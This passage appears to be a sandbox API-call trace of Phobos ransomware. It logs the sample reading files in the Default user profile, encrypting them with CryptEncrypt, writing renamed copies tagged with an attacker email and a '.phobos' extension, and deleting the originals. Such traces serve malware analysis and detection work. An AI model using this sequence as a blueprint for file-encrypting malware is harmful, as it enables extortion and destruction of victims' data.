dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.375] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1063) returned 1 [0207.375] CloseHandle (hObject=0x10c) returned 1 [0207.375] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl")) returned 0x2020 [0207.375] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.375] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.375] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.375] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.376] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0207.376] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.376] ReadFile (in: hFile=0x10c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x427, lpOverlapped=0x0) returned 1 [0207.380] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x430, dwBufLen=0x430 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x430) returned 1 [0207.380] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x430, lpOverlapped=0x0) returned 1 [0207.382] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0207.382] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.382] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0207.382] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.382] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0207.382] CryptDestroyKey (hKey=0xa32928) returned 1 [0207.382] CloseHandle (hObject=0x10c) returned 1 [0207.383] CloseHandle (hObject=0xac) returned 1 [0207.383] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl")) returned 1 [0207.384] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0207.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.384] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=585) returned 1 [0207.384] CloseHandle (hObject=0xac) returned 1 [0207.384] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl")) returned 0x2020 [0207.385] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.385] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.385] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.388] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0207.388] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.388] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x249, lpOverlapped=0x0) returned 1 [0207.392] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x250, dwBufLen=0x250 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x250) returned 1 [0207.392] WriteFile (in: hFile=0x10c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x250, lpOverlapped=0x0) returned 1 [0207.393] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0207.393] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.393] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0207.393] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.393] WriteFile (in: hFile=0x10c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0207.393] CryptDestroyKey (hKey=0xa32928) returned 1 [0207.393] CloseHandle (hObject=0xac) returned 1 [0207.393] CloseHandle (hObject=0x10c) returned 1 [0207.393] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl")) returned 1 [0207.395] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0207.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.395] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1079) returned 1 [0207.396] CloseHandle (hObject=0x10c) returned 1 [0207.396] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl")) returned 0x2020 [0207.406] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.406] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.406] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.406] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.406] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.407] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0207.407] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.407] ReadFile (in: hFile=0x10c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x437, lpOverlapped=0x0) returned 1 [0207.411] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x440, dwBufLen=0x440 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x440) returned 1 [0207.411] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x440, lpOverlapped=0x0) returned 1 [0207.412] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0207.412] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.412] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0207.412] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.412] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0207.412] CryptDestroyKey (hKey=0xa32928) returned 1 [0207.412] CloseHandle (hObject=0x10c) returned 1 [0207.412] CloseHandle (hObject=0xac) returned 1 [0207.413] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl")) returned 1 [0207.414] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0207.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog_RunOnce.etl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog_runonce.etl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.414] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=16384) returned 1 [0207.414] CloseHandle (hObject=0xac) returned 1 [0207.414] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog_RunOnce.etl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog_runonce.etl")) returned 0x2020 [0207.415] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog_RunOnce.etl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog_runonce.etl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog_RunOnce.etl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog_runonce.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.415] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.415] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog_RunOnce.etl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog_runonce.etl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.416] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0207.416] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.416] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4000, lpOverlapped=0x0) returned 1 [0207.587] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4010, dwBufLen=0x4010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4010) returned 1 [0207.588] WriteFile (in: hFile=0x10c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4010, lpOverlapped=0x0) returned 1 [0207.589] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0207.589] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.589] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0207.589] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.589] WriteFile (in: hFile=0x10c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0207.589] CryptDestroyKey (hKey=0xa32928) returned 1 [0207.589] CloseHandle (hObject=0xac) returned 1 [0207.589] CloseHandle (hObject=0x10c) returned 1 [0207.589] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog_RunOnce.etl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog_runonce.etl")) returned 1 [0207.590] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0207.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat.LOG2" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.590] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0207.590] CloseHandle (hObject=0x10c) returned 1 [0207.591] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0207.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TM.blf" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tm.blf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.591] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=65536) returned 1 [0207.591] CloseHandle (hObject=0x10c) returned 1 [0207.591] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TM.blf" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tm.blf")) returned 0x2026 [0207.591] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TM.blf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tm.blf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TM.blf" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.591] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.591] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TM.blf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tm.blf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.594] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0207.594] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.594] ReadFile (in: hFile=0x10c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x10000, lpOverlapped=0x0) returned 1 [0207.627] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10010, dwBufLen=0x10010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10010) returned 1 [0207.627] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x10010, lpOverlapped=0x0) returned 1 [0207.629] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0207.629] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.629] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa0, dwBufLen=0xa0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa0) returned 1 [0207.629] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.629] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x152, lpOverlapped=0x0) returned 1 [0207.629] CryptDestroyKey (hKey=0xa32928) returned 1 [0207.629] CloseHandle (hObject=0x10c) returned 1 [0207.629] CloseHandle (hObject=0xac) returned 1 [0207.629] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TM.blf" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tm.blf")) returned 1 [0207.631] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0207.631] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000001.regtrans-ms" (normalized: 